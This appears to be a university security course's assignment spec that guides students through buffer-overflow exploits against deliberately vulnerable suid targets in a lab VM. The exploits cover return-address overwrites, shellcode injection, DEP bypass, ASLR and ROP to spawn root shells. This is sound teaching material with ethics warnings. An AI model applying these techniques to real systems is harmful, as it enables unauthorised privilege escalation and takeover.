Project 4: Application SecurityFall 2024
This project counts for 9% of your course grade. Late submissions will be allowed with the use of late days.
This is optionally a group project; you may work in teams of two and submit one project per team. You may also work alone. Note that the final exam will cover project material, so you and your partner should collaborate closely on each part.
The code and other answers you submit must be entirely your team’s own work, and you are bound by the Honor Code. You may discuss the conceptualization of the project and the meaning of the questions, but you may not look at any part of someone else’s solution or collaborate with anyone other than your partner. You may consult published references, provided that you appropriately cite them (e.g., with program comments). Visit the course website for the full collaboration policy.
Solutions must be submitted via the Autograder, following the submission details at the end of this spec.
Introduction
This project will introduce you to control-flow hijacking vulnerabilities in application software, including buffer overflows. We will provide a series of vulnerable programs and a virtual machine environment in which you will develop exploits.
Objectives
- Be able to identify and avoid buffer overflow vulnerabilities in native code.
- Understand the severity of buffer overflows and the necessity of standard defenses.
- Gain familiarity with machine architecture and assembly language.
- Understand the mechanics of buffer overflow exploitation.
Read this First
This project asks you to develop attacks and test them in a virtual machine you control. Attempting the same kinds of attacks against others’ systems without authorization is prohibited by law and university policies and may result in fines, expulsion, and jail time. You must not attack anyone else’s system without authorization! Per the course ethics policy, you are required to respect the privacy and property rights of others at all times, or else you will fail the course. See the “Ethics, Law, and University Policies” section on the course website.
Setup
Buffer-overflow exploitation depends on details of the target system. You must develop and test your attacks inside the Project 4 VM, as it has been configured to disable certain security features that would complicate your work.
-
Follow the setup instructions on the Project 4 VM page.
-
Check out your starter code from GitHub inside the VM. You must do this in a folder in the native Linux filesystem. It won’t work correctly if you use a shared folder located in the host OS.
-
Run
./build.sh
. It will prompt you for uniqnames. Each group’s targets will be slightly different, so make sure your uniqnames are correct! -
Run
./test.sh
to build the targets and test the (currently empty) solutions. The test script will report an error for each of the targets.
Resources and Guidelines
No attack tools allowed!
You may not use special-purpose tools meant for testing security or exploiting vulnerabilities except for what comes preinstalled in the VM. You may only use the version that comes preinstalled in the VM (even if it has the same version number).
Using a prohibited tool to complete your project can be an honor code violation. If you have any questions about whether a certain tool is allowed, please ask on Piazza first so that you don’t accidentally violate this policy.
Control hijacking tutorials
Before you begin this project, review the slides from the control-hijacking lectures and attend lab for additional details. Read the classic article Smashing the Stack for Fun and Profit for an introduction to buffer overflow exploitation.
GDB
You will make use of the GDB debugger for dynamic analysis within the
VM, which you should recall from EECS 280. Useful commands that you may
not know are disassemble
, info reg
, x
, and stepi
. See
the GDB help for details, and donβt be afraid to experiment. The
GDB reference sheet may also be useful.
x86_64 assembly
These are many good references for Intel’s assembly language, but note that our project targets use the 64-bit x86_64 ISA (sometimes abbreviated to x64), not the older 32-bit x86 ISA. The stack is organized differently in x86_64 and x86. If you are reading any online documentation, ensure that it is based on the x86_64 architecture, not x86.
Also note that there are 2 different syntaxes for this assembly language, known as Intel syntax and AT&T syntax. They’re
just 2 ways of expressing the same code. In this class we’re always using Intel syntax, but keep in mind that online
resources might be using AT&T syntax. You can tell which is which because AT&T syntax uses percent signs (%
)
everywhere and Intel syntax doesn’t.
If you are getting a segfault
A segfault means that you’re either jumping execution to or dereferencing an address that is incorrect. This means you’re on the right track because you’ve overwritten something! If you are stuck as to where to start looking, check the addresses that your exploit has, and make sure they are both correct and in the correct place.
Targets
The target programs for this project are simple, short C programs with (mostly) clear security vulnerabilities. We have provided source code and a build script that compiles all the targets. Your exploits must work against the targets as compiled and executed within the provided VM.
target0: Overwriting a variable on the stack Easy
This program takes input from a file and prints a message. Your job is
to provide input that causes the program to output:
“Hi uniqname! Your grade is A+.
” (You can use either group member’s
uniqname.) To accomplish this, your input will need to overwrite another
variable stored on the stack.
The read_input(char *destination, char *filename)
function can be found in read_input.c
. It opens the file given to
it, then copies the entire contents of the file into memory starting at the address where destination
points.
Here’s one approach you might take:
-
Examine
target0.c
. Where is the buffer overflow? -
Disassemble
_main
(not to be confused withmain
). What is its starting address? -
Set a breakpoint at the beginning of
_main
and run the program. -
Using GDB from within the VM, set a breakpoint at the beginning of
_main
and run the program.(gdb) break _main (gdb) run <(python3 sol0.py)
-
Draw a picture of the stack. How are
name[]
andgrade[]
stored relative to each other? -
How could a value read into
name[]
affect the value contained ingrade[]
? Test your hypothesis by running./target0
on the command line with different inputs.
What to submit
Create a Python 3 program named sol0.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target0 <(python3 sol0.py)
The above is a little shell trick. It runs python3 sol0.py
, then saves
the output to a “temporary file”. It then uses the name of that temporary
file as a command-line argument for ./target0
.
Hint
In Python 3, you should work with bytes rather than Unicode
strings. To construct a byte literal, use this syntax: b'\xnn'
, where
nn is a 2-digit hex value. To repeat a byte n times, you can do:
b'\xnn'*n
. To output a sequence of bytes, use:
import sys
sys.stdout.buffer.write(b'\x61\x62\x63')
Don’t use print
, because it automatically encodes whatever is being
printed with the default encoding of the console. We don’t want our payload
to be encoded, so we use sys.stdout.buffer.write
.
target1: Overwriting the return address Easy
This program takes input from a file and prints a message. Your job is
to provide input that makes it output: “Your grade is A+.
” Your
input will need to overwrite the return address so that the function
vulnerable
transfers control to print_good_grade
when it
returns.
-
Examine
target1.c
. Where is the buffer overflow? -
Examine the function
print_good_grade
. What is its starting address? -
Using GDB from within the VM, set a breakpoint at the beginning of
vulnerable
and run the program.(gdb) break vulnerable (gdb) run <(python3 sol1.py)
-
Disassemble
vulnerable
and draw the stack. Where isinput[]
stored relative torbp
? How long would an input have to be to overwrite this value and the return address? -
Examine the
rsp
andrbp
registers:(gdb) info reg
-
What are the current values of the saved frame pointer and return address from the stack frame? You can examine two giant words (8 bytes each) of memory at
rbp
using:(gdb) x/2gx $rbp
-
What should these values be in order to redirect control to the desired function?
What to submit
Create a Python 3 program named sol1.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target1 <(python3 sol1.py)
When debugging your program, it may be helpful to view a hex dump of the output. Try this:
$ python3 sol1.py | hd
Remember that x86_64 is little endian. Use Python’s to_bytes
method to
output 64-bit little-endian values like so:
import sys
sys.stdout.buffer.write(0x0123456789abcedf.to_bytes(8, 'little'))
target2: Redirecting control to shellcode Easy
Targets 2 through 7 are owned by the root
user and have the suid
bit set. Your goal is to cause them to launch a shell, which will
therefore have root privileges. Unless otherwise noted, you should use
the shellcode we have provided in shellcode.py
. Successfully placing
this shellcode in memory and setting the instruction pointer to the
beginning of the shellcode (e.g., by returning or jumping to it) will
open a shell.
-
Examine
target2.c
. Where is the buffer overflow? -
Create a Python 3 program named
sol2.py
that outputs the provided shellcode:import sys from shellcode import shellcode sys.stdout.buffer.write(shellcode)
-
Disassemble
vulnerable
. Where doesbuf
begin relative torbp
? What is the offset from the start of the shellcode to the saved return address? -
Set up the target in GDB:
$ gdb ./target2
-
Set a breakpoint in
vulnerable
and start the target. -
Identify the address after the call to
read_input
and set a breakpoint there:(gdb) break *<address>
Run the program. It will stop it reaches that breakpoint.
(gdb) run <(python3 sol2.py)
-
Examine the bytes of memory where you think the shellcode is to confirm your calculation:
(gdb) x/32bx <address>
-
Disassemble the shellcode:
(gdb) disas/r <address>,+32
How does it work?
-
Modify your solution to overwrite the return address and cause it to jump to the beginning of the shellcode.
What to submit
Create a Python 3 program named sol2.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target2 <(python3 sol2.py)
If you are successful, you will see a root shell prompt (#
). Running
whoami
will output “root
”. Running exit
will return to your normal
shell.
If your program segfaults, you can examine the state at the time of the
crash using GDB with the core dump: gdb ./target2 core
. To enable
creating core dumps, run ulimit -c unlimited
. The file core
won’t be
created if a file with the same name already exists. Also, since the
target runs as root, you will need to run it using sudo ./target2
in
order for the core dump to be created.
target3: Overwriting the return address indirectly Medium
In this target, the buffer overflow is restricted and cannot directly overwrite the return address. You’ll need to find another way. Your input should cause the provided shellcode to execute and open a root shell.
The read_input_with_limit(char *destination, char *filename, size_t limit)
function can be found in read_input.c
.
It opens the file given to it, then copies the contents of the file into memory starting at the address where
destination
points. However, it will only copy the first limit
bytes, even if the file is longer than that.
What to submit
Create a Python 3 program named sol3.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target3 <(python3 sol3.py)
target4: Beyond strings Medium
This target takes as its command-line argument the name of a data file it will read. The file format is a 64-bit count followed by that many 32-bit integers (all little endian). Create a data file that causes the provided shellcode to execute and opens a root shell.
Hint: First figure out how an attacker can cause a buffer overflow in
this program. Note that the read_elements
function breaks the for-loop
once the end of the file is reached, so the 64-bit count does not need
to be truthful.
What to submit
Create a Python 3 program named sol4.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target4 <(python3 sol4.py)
target5: Bypassing DEP Medium
This program resembles target2
, but it has been compiled with data
execution prevention (DEP) enabled. DEP means that the processor will
refuse to execute instructions stored on the stack. You can overflow the
stack and modify values like the return address, but you can’t jump to
any shellcode you inject. You need to find another way to run the
command /bin/sh
and open a root shell.
What to submit
Create a Python 3 program named sol5.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target5 <(python3 sol5.py)
Warning: Do not try to create a solution that depends on you manually setting environment variables. You cannot assume that the autograder will run your solution with the same environment variables that you have set.
target6: Variable stack position Medium
When we constructed the previous targets, we ensured that the stack
would be in the same position every time the vulnerable function was
called, but this is often not the case in real targets. In fact, a
defense called ASLR (address-space layout randomization) makes buffer
overflows harder to exploit by changing the starting location of the
stack and other memory areas on each execution. This target resembles
target2
, but the stack position is randomly offset by 0β256 bytes each
time it runs. You need to construct an input that always opens a root
shell despite this randomization.
What to submit
Create a Python 3 program named sol6.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target6 <(python3 sol6.py)
Warning: If you see any output before the root shell is opened, you have not done this target correctly and your solution will not be accepted by the autograder.
target7: Return-oriented programming Hard
This target is identical to target2
, but it is compiled with DEP
enabled. Implement a ROP-based attack to bypass DEP and open a root
shell.
It will be helpful to use a tool such as ROPgadget.
The ROPgadget
command is already installed on the provided VM.
View its usage by running ROPgadget -h
. The --binary
and --multibr
flags will be particularly helpful.
-
Though there are a number of ways you could implement a ROP exploit, for this target you should use the
setuid
syscall to become root, followed by theexecve
syscall to run the/bin/sh
binary. This is equivalent to:setuid(0); execve("/bin/sh", 0, 0);
-
syscall
is the assembly instruction for making a syscall. In order specify which kind of syscall you want to make (and what arguments you want to make it with), you have to set certain registers to specific values. Consult this table for a reference. -
You may want to look at the assembly in
shellcode.py
for some inspiration. You probably won’t be able to find gadgets that work exactly the same way as this shellcode, but it should be a good starting point. -
We recommend that you start by getting the
execve
call to work on its own, withoutsetuid
. When you do this correctly, it will open a shell, but you won’t be root. Then modify your solution to make it callsetuid
first, and you’ll get a root shell.
What to submit
Create a Python 3 program named sol7.py
that prints a line to be
passed as input to the target. Test your program with the command line:
$ ./target7 <(python3 sol7.py)
target8: Reverse-engineering with Ghidra Hard
Because this target centers around reverse-engineering and requires extensive exploration, any information that you learn about the binary—even if it is not code written by you—is considered part of your solution. Please use discretion and refrain from discussing details of the target outside of your group, including on Piazza.
For this target, you are provided only a compiled binary named target8
and an input file named input8.dat
. The program is closed-source.
Try running the target with the provided input:
$ ./target8 input8.dat
Hello, world!
What to submit
Create a Python 3 program named sol8.py
that prints a line to be passed as input to the target. Doing so should cause
the lights on the BBB spiral staircase to blink. Test your program with the command line:
$ ./target8 <(python3 sol8.py)
If you’re not in the BBB, you can view the live state of the blinkenlights at blinken.org.
It’s fine if the target also prints some output, but it should not crash.
Hints
-
First, use Ghidra to determine how the program works. We’ll give a Ghidra tutorial in lab.
-
Import
target8
into Ghidra and analyze it. The VM has Ghidra pre-installed, as explained in the instructions. For this assignment, you don’t need to change any of the default options. -
Concentrate on the Functions, Decompiler, and Listing views, all available from the Window menu. As a starting point, use Functions to select
main
, then examine it in the Decompiler. -
The Decompiler produces an approximation of the original C code, but its output is sometimes very different from how a programmer would tend to express the same operation. The original variable names and comments were stripped by the compiler, and often the original data types cannot be automatically inferred. To make the program more readable, the Decompiler lets you manually add comments, rename variables, and correct variable types and function signatures (all by right-clicking). To navigate into a function call, double-click; use the back button (in the upper left) to return to where you were.
-
The Listing view shows the disassembled instructions, which are more accurate but harder to read than the Decompiler view. Use both views together to get a clearer picture of what’s going on. If you select lines of code in the Decompiler, the Listing will highlight the equivalent portion of the disassembly, and vice versa.
-
-
Inspect the provided input file using
hd input8.dat
. As an intermediate goal, create an input file that causes the target to outputGhidra rocks!
. This will require understanding the target using Ghidra, but you won’t need to do any control-flow hijacking. (You do not need to submit anything for this.) -
The target contains a simple-to-exploit vulnerability similar to one of the earlier targets. It also contains some unused code that will be very useful for accomplishing your objective. Since you don’t have the source code, you’ll need to discover both using Ghidra. Happy hacking!
Frequently Asked Questions
Q: I get a root shell when I run sudo ./test.sh
. Am I done?
A: No! You should only run test.sh
without sudo
. If you run it under sudo
,
then your shells will always be spawned as the root
user, whether you have accomplished
the task of opening a root shell or not. If you previously ran test.sh
with sudo
,
you might get permission errors from Git when you run the test script without sudo
.
To fix this, run the following in the root directory of your local repository:
$ sudo chown -R eecs388:eecs388 .git
Q: My solution works in GDB but not from the command line.
A: The most likely explanation is that you’re referencing data from argv[]
. Since argv[]
comes from outside of _main
’s stack frame, its position can vary depending
on the size of the environment and arguments, which can be slightly different when
running under gdb
. The best solution is to find the data you need in the stack
frame of the vulnerable function, rather than from argv[]
.
Submission Details
-
Create a repo using the GitHub template. Make sure that the repo you create is private.
-
Establish a team on the autograder. Only teams created on the autograder will be able to join the online office hours queue.
Although the autograder submission screen shows the 6 p.m. deadline, you can still submit after this time subject to a lateness penalty, up until the start of the first lab following the deadline. Any submissions after the posted deadline will result in a late deduction, even if your best submission occurred before the deadline. The autograder will not warn you of this. (You don’t get to attempt a higher score after the deadline with no risk.)
Your files can make use of standard Python 3 libraries and the provided
shellcode.py
, but they must be otherwise self-contained. Do not modify
or include the targets, build script, shellcode.py
, etc. Be sure to test
that your solutions work correctly in an unmodified copy of the provided
VM, without installing or updating any packages or changing any environment
variables.